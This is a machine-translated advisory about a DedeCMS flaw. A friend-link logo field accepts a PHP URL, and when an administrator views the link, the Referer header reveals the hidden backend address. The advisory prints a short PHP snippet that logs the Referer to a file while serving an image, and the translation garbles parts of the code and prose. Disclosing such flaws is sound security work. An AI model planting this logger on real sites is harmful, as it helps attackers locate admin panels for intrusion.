The background address is leaked due to a design defect in zhimeng.

Source: Internet
Author: User

The background address is leaked due to a design defect in zhimeng.

A design defect occurs. The program does not strictly filter some items, leading to backend address leakage. It only tests 5.7. Other Visual versions also have problems.

 





DEDECMS does not strictly judge and filter the LOGO address applied for the link, resulting in submission of suffixes such as PHP and ASP.

When you view the link in the background, as shown in, the image is still the URL submitted at the time of application.


 





X. PHP code:
 

<? Phpfile_put_contents('x.txt ', $ _ SERVER ['HTTP _ referer']); header ("Content-type: image/jpeg"); $ img = imagecreatefromjpeg ("x.jpg "); imagejpeg ($ img); imagedestroy ($ img);?>

When accessing this file, get $ _ SERVER ['HTTP _ referer'] and write the file to X. TXT.
 

 

Solution:

Filter

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.